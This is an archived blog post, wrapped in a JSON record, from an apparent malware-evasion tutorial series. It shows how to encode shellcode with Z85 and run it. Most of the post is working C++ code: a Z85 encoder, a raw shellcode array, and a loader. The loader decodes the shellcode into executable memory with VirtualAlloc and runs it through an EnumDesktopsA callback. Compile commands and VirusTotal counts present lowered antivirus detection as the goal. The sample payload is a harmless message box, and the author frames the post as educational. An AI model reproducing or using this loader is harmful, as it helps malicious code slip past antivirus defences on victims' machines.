{
	"id": "7a677171-1f1e-4d16-b72a-e218c36b41e3",
	"created_at": "2026-04-06T01:29:23.616155Z",
	"updated_at": "2026-04-10T13:12:14.735139Z",
	"deleted_at": null,
	"sha1_hash": "9b8ff74f49e1b3a924032bf29aa7de597a86ba62",
	"title": "Malware AV evasion - part 8. Encode payload via Z85 algorithm. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1230439,
	"plain_text": "Malware AV evasion - part 8. Encode payload via Z85 algorithm. C++\r\nexample.\r\nBy cocomelonc\r\nPublished: 2022-07-30 · Archived: 2026-04-06 00:11:16 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis article is the result of my own research into an interesting trick: encoding a payload via Z85.\r\nSince the methods of encrypting the payload with the AES and XOR algorithms and encoding it (for example, with the\r\nbase64 algorithm) have been studied by blue teamers quite well, the question arose of trying to hide the payload in a\r\nnon-standard way.\r\nZ85\r\nAscii85, also called Base85, is a form of binary-to-text encoding used to communicate arbitrary binary data over\r\nchannels that were designed to carry only English language human-readable text. Z85 is a format for representing binary\r\nhttps://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nPage 1 of 8\n\ndata as printable text. Z85 is a derivative of existing Ascii85 encoding mechanisms, modified for better usability,\r\nparticularly for use in source code.\r\npractical example\r\nLet’s look at a practical example. 
First of all, encode our payload via Z85 (encode.cpp):\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstdlib.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003c./z85.h\u003e\r\n#include \u003c./z85.c\u003e\r\n#include \u003cwindows.h\u003e\r\nchar* encode(const char* src, size_t len) {\r\n // allocate output buffer (+1 for null terminating char)\r\n char* dest = (char*)malloc(Z85_encode_with_padding_bound(len) + 1);\r\n if (len == 0) {\r\n dest[0] = '\\0'; // write null terminating char\r\n return dest;\r\n }\r\n // encode the input buffer, padding it if necessary\r\n len = Z85_encode_with_padding(src, dest, len);\r\n if (len == 0) { // something went wrong\r\n free(dest);\r\n return NULL;\r\n }\r\n dest[len] = '\\0'; // write null terminating char\r\n return dest;\r\n}\r\nunsigned char payload[] =\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n 
\"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main() {\r\n char* str = encode((const char*)payload, sizeof(payload));\r\n if (str) {\r\n printf(\"%s\\n\", str);\r\n free(str);\r\n }\r\n return 0;\r\n}\r\nThen compile it:\r\nx86_64-w64-mingw32-g++ -O2 encode.cpp -o encode.exe -I/usr/share/mingw-w64/include/ -I/home/cocomelonc/hacking/cybe\r\nand run:\r\n.\\encode.exe\r\nAs usual, for simplicity I used the meow-meow messagebox payload:\r\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n 
\"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nThen, in the next step, we put this encoded payload into our “malware”. 
I took the technique of running the payload from\r\none of the previous articles:\r\n/*\r\n* hack.cpp\r\n* Z85 encode payload\r\n* author: @cocomelonc\r\n* https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\n*/\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstdlib.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003c./z85.h\u003e\r\n#include \u003c./z85.c\u003e\r\n#include \u003cwindows.h\u003e\r\nint main(int argc, char* argv[]) {\r\n BOOL rv;\r\n HANDLE th;\r\n DWORD oldprotect = 0;\r\n char e_my_payload[] = \"2@78z1[C\u0026K*\u003e*fqf06%EFp/pd\u003enhnL7nq*wNk1HPf7^pGGqxOd]I/ISTndSg4n\u003e?4Znhm]YjyJQsefEl{:QHJp.q:\u0026W\r\n char d_my_payload[314] = {};\r\n size_t d = Z85_decode_with_padding(e_my_payload, d_my_payload, strlen(e_my_payload));\r\n LPVOID mem = VirtualAlloc(NULL, sizeof(d_my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n RtlMoveMemory(mem, d_my_payload, sizeof(d_my_payload));\r\n EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, 0);\r\n return 0;\r\n}\r\nMany thanks to @artemkin for the working C/C++ implementation, including encoding/decoding with padding.\r\ndemo\r\nLet’s see everything in action. 
Compile our “malware”:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -I/home/cocomelonc/hacking/cybersec\r\nand run it on our victim’s machine:\r\n.\\hack.exe\r\nAs you can see, everything works perfectly :)\r\nLet’s upload hack.exe to VirusTotal:\r\nSo, 14 of 70 AV engines detect our file as malicious.\r\nhttps://www.virustotal.com/gui/file/6345f46e33919dd1e0691508a1f705d33ed44aadbdd1bb01a15fdad628b29fca/detection\r\nIf you remember, this technique without encoding showed the result 16 of 66:\r\nhttps://www.virustotal.com/gui/file/657ff9b6499f8eed373ac61bf8fc98257295869a833155f68b4d68bb6e565ca1/detection\r\nWe have reduced the number of AV engines which detect our malware from 16 to 14!\r\nSo it can be assumed that evasion works.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers’ arsenal.\r\nZ85\r\nhttps://github.com/artemkin/z85\r\nEnumDesktopsA\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and goodbye! PS. All drawings and screenshots are mine.\r\nSource: https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html"
	],
	"report_names": [
		"malware-av-evasion-8.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775438963,
	"ts_updated_at": 1775826734,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9b8ff74f49e1b3a924032bf29aa7de597a86ba62.pdf",
		"text": "https://archive.orkl.eu/9b8ff74f49e1b3a924032bf29aa7de597a86ba62.txt",
		"img": "https://archive.orkl.eu/9b8ff74f49e1b3a924032bf29aa7de597a86ba62.jpg"
	}
}